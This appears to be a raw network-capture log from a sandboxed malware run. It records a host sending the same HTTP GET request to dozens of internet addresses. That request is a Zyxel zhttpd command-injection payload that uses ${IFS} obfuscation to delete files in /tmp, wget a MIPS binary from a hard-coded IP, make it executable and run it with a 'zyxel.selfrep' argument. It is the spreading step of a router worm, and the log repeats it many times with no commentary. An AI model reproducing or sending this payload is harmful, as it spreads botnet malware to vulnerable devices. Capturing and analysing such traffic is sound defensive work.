                                                Jan 28, 2024 10:16:12.620733023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1243192.168.2.235221427.253.116.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620745897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1244192.168.2.233359818.132.39.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620774984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1245192.168.2.233371467.170.245.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620812893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1246192.168.2.234076851.233.60.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620825052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1247192.168.2.234482266.200.169.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620841026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1248192.168.2.2360772159.113.191.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620852947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1249192.168.2.234556451.110.127.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620872974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1250192.168.2.2356404170.255.191.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620901108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1251192.168.2.235632085.178.244.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620937109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1252192.168.2.235002268.232.7.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620959997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1253192.168.2.2359208177.101.207.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620973110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1254192.168.2.2342202209.101.145.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.620990038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1255192.168.2.234756035.214.73.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621005058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1256192.168.2.2336328145.34.29.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621012926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1257192.168.2.2341476170.96.125.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621025085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1258192.168.2.2358662165.229.164.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621045113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1259192.168.2.234112472.181.253.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621088982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1260192.168.2.234797472.6.167.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621110916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1261192.168.2.2355592121.126.150.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621140003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1262192.168.2.2344948148.197.121.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621140957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1263192.168.2.2349596192.163.98.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621166945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1264192.168.2.2352168118.204.209.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621191978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1265192.168.2.2336620207.21.176.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621215105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1266192.168.2.2339216195.227.64.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621241093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1267192.168.2.235822024.82.12.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621263981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1268192.168.2.2352042175.46.195.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621299028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1269192.168.2.235840066.33.247.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621340036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1270192.168.2.235593479.146.61.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.621362925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1271192.168.2.2351236159.5.215.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.623385906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1272192.168.2.2334930198.165.196.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.623406887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1273192.168.2.233912882.202.64.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.623408079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1274192.168.2.234398464.69.53.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.623933077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1275192.168.2.233356035.217.217.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.623933077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1276192.168.2.235156496.180.68.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.623960018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1277192.168.2.235278219.160.195.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.623999119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1278192.168.2.234977419.82.54.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624058008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1279192.168.2.235336037.167.194.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624078989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1280192.168.2.23367561.251.214.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624088049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1281192.168.2.2341312164.108.248.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624109030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1282192.168.2.235766439.50.112.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624150991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1283192.168.2.234967231.252.115.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624166012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1284192.168.2.2337132197.55.121.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624187946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1285192.168.2.235836212.254.196.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624214888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1286192.168.2.2341688210.55.189.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624226093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1287192.168.2.2349360139.211.108.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624254942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1288192.168.2.233450268.221.98.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624279022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1289192.168.2.2356070219.198.200.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624337912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1290192.168.2.2347170222.120.161.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624361038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1291192.168.2.2352314146.213.229.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624406099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1292192.168.2.2344564167.243.71.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624407053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1293192.168.2.2340216150.238.218.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624442101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1294192.168.2.2345036124.239.39.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.624480963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1295192.168.2.2348528152.3.197.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631360054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1296192.168.2.236094640.99.253.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631398916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1297192.168.2.2345910209.29.36.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631419897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1298192.168.2.2353622185.33.33.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631441116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1299192.168.2.2359712167.133.78.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631453037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1300192.168.2.23609282.180.247.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631467104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1301192.168.2.2352648140.66.157.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631539106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1302192.168.2.2355420210.148.60.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631565094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1303192.168.2.2345850112.2.98.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.631594896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1304192.168.2.2342726208.170.147.85443
                                                TimestampBytes transferredDirectionData
